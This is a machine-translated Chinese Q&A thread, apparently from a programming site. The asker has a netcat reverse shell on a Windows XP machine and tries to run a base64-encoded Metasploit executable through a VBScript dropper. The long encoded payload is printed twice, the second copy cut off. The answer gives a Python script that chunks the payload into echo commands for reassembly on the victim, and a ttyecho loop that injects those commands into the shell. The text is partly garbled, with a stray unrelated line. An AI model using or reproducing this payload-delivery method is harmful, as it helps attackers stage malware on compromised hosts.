对于安全测试,会创建一个名为 msf.vbs 的vbs脚本,用于执行metasploit生成的有效负载。例如:
root@sh:~# nc -v -l -p 4444
listening on [any] 4444 ...
192.168.1.104: inverse host lookup failed: Unknown host
connect to [192.168.1.105] from (UNKNOWN) [192.168.1.104] 1749
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\test\Desktop>cscript.exe %temp%\msf.vbs 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
cscript.exe %temp%\msf.vbs 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
Microsoft (R) Windows Script Host Version 5.7
Copyright (C) Microsoft Corporation. All rights reserved.
C:\DOCUME~1\test\LOCALS~1\Temp\msf.vbs(1, 823) (null): 0x800700C1
如果脚本在 localhost 上的cmd.exe中使用,一切顺利。但如果在 netcat cmd shell中使用它,则有效负载将被破坏。例如:
我的问题如下:
$('#day-08-07-2016')
答案 0 :(得分:0)
没有传输整个有效负载的原因是什么?
NC中有一个尺寸限制,禁止任何超过315个字符的传输。你的长度是6,188。
如何在netcat中发送长字符串 - cmd shell?
分解。以下python脚本将为您做到这一点(它的设置在80个字符处打破,非常好,整齐到终端 - 脚本的功劳是:OS-18568)所以传输工作正常,然后在123.hex重新加入它们通过在MS-DOS中使用一种技术将文件多次回显到一行:
#!/usr/bin/python
import sys
def split_by_length(s,block_size):
w=[]
n=len(s)
for i in range(0,n,block_size):
w.append(s[i:i+block_size])
if w[-1].isspace():
del w[-1]
return w
with open(sys.argv[1]) as file:
for line in file:
line = line.rstrip('\n')
# if line is longer than 80
if len(line) > 80:
# split line
newlines=split_by_length(line,80)
# if line starts with space, create space at the end of previous line
# echo|set /p and <nul set /p remove leading spaces/tabs and equal signs
for index, newline in enumerate(newlines):
if newline.startswith(" "):
newlines[index-1] = newlines[index-1] + " "
# rewrite lines
for index, newline in enumerate(newlines):
# 1st line: remove echo and create line with no carriage return
if index == 0:
newline = newline.replace("echo ","",1)
newline = 'echo|set /p="' + newline + '" >>123.hex'
# last line: add echo
elif index == len(newlines)-1:
newline = "echo " + newline
# middle lines: create line with no carriage return and add >> 123.hex
else:
newline = 'echo|set /p="' + newline + '" >>123.hex'
print newline
else:
print line
你没有问过的问题,但可能是下一个问题 -
如何将这些细分信息输入运行我的反向shell的终端?
您需要以下应用程序:ttyecho 在此处找到:https://github.com/buglessdr/ttyecho
然后,一旦完成,您可以运行以下小型bash脚本将所有内容整合在一起:
while read -r line; do /git/ttyecho/ttyecho -n /dev/pts/0 "$line"; done < commandsplit.txt
提示 - 要确定哪个终端有会话,您可以使用以下命令:
tty